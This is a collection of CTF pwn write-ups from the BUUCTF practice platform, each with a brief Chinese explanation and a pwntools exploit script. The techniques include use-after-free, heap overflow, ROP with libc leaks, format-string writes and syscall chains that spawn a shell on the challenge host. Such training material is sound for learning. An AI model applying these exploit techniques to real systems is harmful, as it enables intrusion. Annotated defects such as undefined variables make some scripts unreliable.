BUUCTF pwn水题大赏
[BJDCTF2nd]ydsneedgirlfriend2
UAF 漏洞：把 print 的位置覆盖成 backdoor 的地址，然后 show 就可以跳转到 backdoor。
exp:
from pwn import*
# pwntools target setup: 64-bit Linux, verbose I/O logging.
context(arch='amd64',os='linux')
context.log_level = 'DEBUG'
# Local run kept commented out for debugging; the live target is the BUUCTF practice instance.
#p=process('./ydsneedgirlfriend2')
p=remote('node3.buuoj.cn',29604)
# Address the writeup refers to as the backdoor. Note it is never read by name
# below: the add() call later repeats the same literal 0x400D86 inline.
flag=0x400D86
def add(length, name):
    """Menu option 1: create a record with a *length*-byte name.

    *name* is sent with ``sendafter`` (no newline appended), so the caller
    controls every byte that ends up in the name buffer.
    """
    menu_choice = '1'
    p.sendlineafter('choice :', menu_choice)
    p.sendlineafter('the length of her name:', str(length))
    p.sendafter('her name:', name)
def dele(index):
    """Menu option 2: delete the record stored at *index*."""
    dialogue = (('choice :', '2'), ('Index :', str(index)))
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def show(index):
    """Menu option 3: display the record stored at *index*."""
    steps = [('choice :', '3'), ('Index :', str(index))]
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
# Two records: slot 0 with a 0x30-byte name, slot 1 with a 0x10-byte name.
add(0x30,'0')
add(0x10,'1')
# Free slot 0. Per the writeup the stale pointer survives (the UAF).
dele(0)
# Allocate again with the backdoor address (same literal as `flag` above)
# written twice into a 0x10-byte name; the writeup's claim is that this
# new allocation overlaps the freed record's print pointer.
add(0x10,p64(0x400D86)*2)
# show(0) dereferences the overwritten pointer.
show(0)
#gdb.attach(p)
p.interactive()
babyheap_0ctf_2017
堆溢出
exp:
from pwn import*
# pwntools setup: debug-level I/O logging, 64-bit Linux target.
context(log_level="debug")
context(arch='amd64',os='linux')
p=remote('node3.buuoj.cn',26222)
#p=process('./babyheap_0ctf_2017')
# Loaded but never referenced below; every address is derived from the leak.
elf=ELF('./babyheap_0ctf_2017')
def add(size):
    """Menu option 1: request an allocation of *size* bytes."""
    dialogue = (
        (': ', '1'),
        ('Size: ', str(size)),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def edit(index, size, content):
    """Menu option 2: write *size* bytes of *content* into slot *index*.

    *content* is sent with ``sendlineafter``, so a newline follows it.
    """
    steps = [
        (':', '2'),
        ('Index: ', str(index)),
        ('Size: ', str(size)),
        ('Content: ', content),
    ]
    for prompt, data in steps:
        p.sendlineafter(prompt, data)
def free(index):
    """Menu option 3: release the chunk held in slot *index*."""
    menu_choice = '3'
    slot = str(index)
    p.sendlineafter(':', menu_choice)
    p.sendlineafter('Index: ', slot)
def show(index):
    """Menu option 4: dump the contents of slot *index*."""
    for prompt, answer in [(':', '4'), ('Index: ', str(index))]:
        p.sendlineafter(prompt, answer)
def exit():
    """Menu option 5: leave the program's menu loop.

    This shadows the builtin ``exit``; the name is kept because it is the
    script's interface, but it is never called below.
    """
    menu_choice = '5'
    p.sendlineafter(':', menu_choice)
# --- Stage 1: lay out the heap --------------------------------------------
# Five allocations: four of 0x10 bytes and one of 0x80.
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
free(1)
free(2)
# Write past the end of slot 0 (the writeup calls this the heap overflow):
# the payload carries two 0x21 size words and ends with a single byte 0x80.
payload=p64(0)*3+p64(0x21)+p64(0)*3+p64(0x21)+p8(0x80)
edit(0,len(payload),payload)
# Same shape from slot 3: a 0x21 size word after three zero words.
payload1=p64(0)*3+p64(0x21)
edit(3,len(payload1),payload1)
# Re-allocate the two freed slots and touch them.
add(0x10)#1
add(0x10)#2
edit(1,4,'aaaa')
edit(2,4,'aaaa')
# From slot 3 again, now with a 0x91 size word.
payload2=p64(0)*3+p64(0x91)
edit(3,len(payload2),payload2)
add(0x80)#5
free(4)
# --- Stage 2: libc leak ---------------------------------------------------
# show(2) prints slot 2; the script takes the 6 bytes up to and including
# 0x7f and zero-extends them to a 64-bit pointer.
show(2)
leak=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
# 0x3c4b78, 0x3c4aed and 0x4526a are libc-build-specific constants taken as
# given by the writeup; they will not hold for a different libc build.
libc_base=leak-0x3c4b78
# Python 2 print statements: this script does not parse on Python 3.
print hex(libc_base)
print hex(leak)
# --- Stage 3 --------------------------------------------------------------
# Free slot 4, write a libc-relative address into slot 2, then allocate two
# 0x60-byte chunks and write into the second of them (slot 6).
add(0x60)#4
free(4)
payload3=p64(libc_base+0x3c4aed)
edit(2,len(payload3),payload3)
print hex(libc_base+0x3c4aed)
add(0x60)#4
add(0x60)#6
# 3 zero bytes + 2 zero words, then the libc-relative address.
payload4=p8(0)*3+p64(0)*2+p64(libc_base+0x4526a)
edit(6,len(payload4),payload4)
add(255)
#gdb.attach(p)
p.interactive()
ciscn_2019_ne_5
system 函数的参数是 sh 的时候也可以得到权限（sh 用 gdb 的指令 find sh 找）。
exp:
from pwn import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',27800)
#p=process('./ciscn_2019_ne_5')
# Loaded but never read below; the two addresses are hard-coded instead.
elf=ELF('./ciscn_2019_ne_5')
# 32-bit addresses from the writeup: the one it uses for system and a "sh"
# string (the prose says it was located with gdb's `find sh`). Rebinding
# the name `sys` is a readability hazard given the stdlib module of that name.
sys=0x80484D0
sh=0x80492ea
#gdb.attach(p)
# The program asks for an admin password first; value as given in the writeup.
p.sendlineafter('Please input admin password:','administrator')
# 0x48 bytes of padding, 4 filler bytes ('bbbb', presumably the saved frame
# pointer slot), then system twice followed by its argument.
payload='a'*0x48+'bbbb'+p32(sys)*2+p32(sh)
p.sendlineafter(':','1')
p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
p.interactive()
[HarekazeCTF2019]baby_rop2
通过 printf 泄露 libc，然后栈溢出（flag 在 home 目录下，可以用 find -name 'flag' 找）。
exp:
from pwn import*
from LibcSearcher import*
context.log_level='debug'
#p=process('./babyrop2')
p=remote("node3.buuoj.cn",28858)
elf=ELF('babyrop2')
# Symbols resolved from the binary; they are used as absolute addresses, so
# this presumes the binary is not position independent.
printf_plt=elf.plt['printf']
read_got=elf.got['read']
main_plt=elf.sym['main']
# Gadget and string addresses hard-coded from the writeup.
pop_rdi=0x0000000000400733
pop_rsi_r15=0x0000000000400731
format_str=0x0000000000400770
ret_addr=0x0000000000400734   # defined but never used below
# Stage 1: 0x28 bytes of padding, then printf called with format_str and
# read_got as its arguments (r15 receives the p64(0) filler), returning into
# main so a second input can be sent.
payload='a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)
p.recvuntil("name? ")
p.sendline(payload)
# The 6 bytes up to and including 0x7f are taken as the leaked read() address.
read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(read_addr)   # Python 2 print statement
# LibcSearcher is a third-party lookup (not on the page's import list of
# stdlib); if several libc builds match the leak it may prompt interactively.
libc=LibcSearcher('read', read_addr)
libc_base=read_addr-libc.dump('read')
print hex(libc_base)
sys_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
# Stage 2: same padding, then system with the "/bin/sh" string as argument;
# the trailing p64(0) is not explained by the writeup.
payload='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)+p64(0)
p.sendline(payload)
p.interactive()
jarvisoj_fm
改 x=4，找对 printf，多用 gdb 调试，偏移为 11。
exp:
from pwn import*
p=remote('node3.buuoj.cn',25621)
#p=process('./fm')
# Address of the global the writeup says must become 4.
x=0x0804A02C
# Format-string write: the 4-byte address goes first, then %11$n stores the
# count of bytes printed so far (4) into it. 11 is the stack offset the
# writeup says it found with gdb.
payload=p32(x)+'%11$n'
p.sendline(payload)
p.interactive()
pwn2_sctf_2016
用负数绕过 if 判断，用 printf 泄露 libc。
exp:
from pwn import*
from LibcSearcher import*
context.log_level = 'DEBUG'
p=remote('node3.buuoj.cn',28484)
#p=process('./pwn2_sctf_2016')
elf=ELF('./pwn2_sctf_2016')
# Format string address hard-coded from the writeup; the rest is resolved
# from the binary (used as absolute addresses, so no PIE is presumed).
format_str=0x080486F8
printf_plt=elf.plt['printf']
main_addr=elf.symbols['main']
printf_got=elf.got['printf']
# The writeup's negative length answer to the "read?" prompt.
p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('data!\n')
# Stage 1: 0x30 bytes of padding, then printf(format_str, printf_got) with
# main as its return address.
payload1='a'*0x30+p32(printf_plt)+p32(main_addr)+p32(format_str)+p32(printf_got)
p.sendline(payload1)
# Two occurrences of 'said: ' are consumed before the 4-byte leak is read.
p.recvuntil('said: ')
p.recvuntil('said: ')
printf_addr = u32(p.recv(4))
print hex(printf_addr)   # Python 2 print statement
#gdb.attach(p)
# LibcSearcher is a third-party lookup; it may prompt if several builds match.
libc = LibcSearcher('printf', printf_addr)
libc_base=printf_addr-libc.dump('printf')
print hex(libc_base)
sys=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
# Stage 2: same prompt sequence, then system("/bin/sh") with main as the
# return address.
p.recvuntil('read? ')
p.sendline('-1')
p.recvuntil('data!\n')
payload2='a'*0x30+p32(sys)+p32(main_addr)+p32(binsh)
p.sendline(payload2)
p.interactive()
jarvisoj_tell_me_something
栈溢出到 good_game 函数。
exp:
from pwn import *
# Port is passed as a string here; pwntools appears to accept it, but an
# int is the conventional form.
p=remote("node3.buuoj.cn","27384")
# 136 bytes of padding followed by the address the writeup gives for good_game.
payload='a'*136+p64(0x0000000000400620)
p.recvuntil("\n")
# send() rather than sendline(): no trailing newline is appended.
p.send(payload)
p.interactive()
picoctf_2018_rop chain
gets 溢出，给 win_function1 和 win_function2 的参数赋值，从而满足 flag 函数的调用条件。
exp:
from pwn import*
p=remote('node3.buuoj.cn',27082)
# NOTE(review): both assignments below bind `win`, yet the payload references
# `win1` and `win2`, which are never defined -- as written this script raises
# NameError at the payload line. The two addresses look like they were meant
# to be win1 and win2 respectively; confirm against the binary.
win=0x080485CB
win=0x080485D8
flag=0x0804862B
# 0x1c bytes of padding, then the three function addresses and the two
# constants the writeup says satisfy the flag function's conditions.
payload='a'*0x1c+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendlineafter('input> ',payload)
p.interactive()
cmcc_simplerop
栈溢出，将 /bin/sh 写入 bss 段，再进行系统调用。
exp:
from pwn import*
#p=process('./simplerop')
p=remote('node3.buuoj.cn',29587)
# Gadget and data addresses hard-coded from the writeup. Syscalls go through
# int 0x80 directly, which suggests a statically linked 32-bit binary.
pop_eax_ret=0x80bae06
pop_bcdx_ret=0x806e850
int_80=0x806EEF0
bss=0x80EB010
# 0x20 bytes of padding, then two syscalls: eax=3 with the popped values
# (8, bss, 0), and eax=11 with (0, 0, bss). Which of ebx/ecx/edx receives
# which value depends on the pop order of pop_bcdx_ret, not visible here.
payload='a'*0x20+p32(pop_eax_ret)+p32(3)+p32(pop_bcdx_ret)+p32(8)+p32(bss)+p32(0)+p32(int_80)+p32(pop_eax_ret)+p32(11)+p32(pop_bcdx_ret)+p32(0)+p32(0)+p32(bss)+p32(int_80)
p.sendline(payload)
# The 7-byte string is sent without a newline; per the writeup it lands in bss.
p.send('/bin/sh')
# `sleep` comes from `from pwn import*`.
sleep(0.1)
p.interactive()
[ZJCTF 2019]Login
C++ 题目，用户名为 admin，密码为 2jctf_pa5sw0rd，然后栈溢出到 /bin/sh。
exp:
from pwn import*
p = remote('node3.buuoj.cn',26877)
p.sendlineafter('username: ','admin')
# NOTE(review): the writeup quotes the password as 2jctf_pa5sw0rd, but the
# payload sends '2jctf_pa5sw0r' (no trailing 'd') followed by 58 NUL bytes and
# the return address 0x400E88; whether the shorter string is intentional
# cannot be confirmed from here.
payload = '2jctf_pa5sw0r'+'\x00'*58+p64(0x400E88)
p.sendlineafter('password: ',payload)
p.interactive()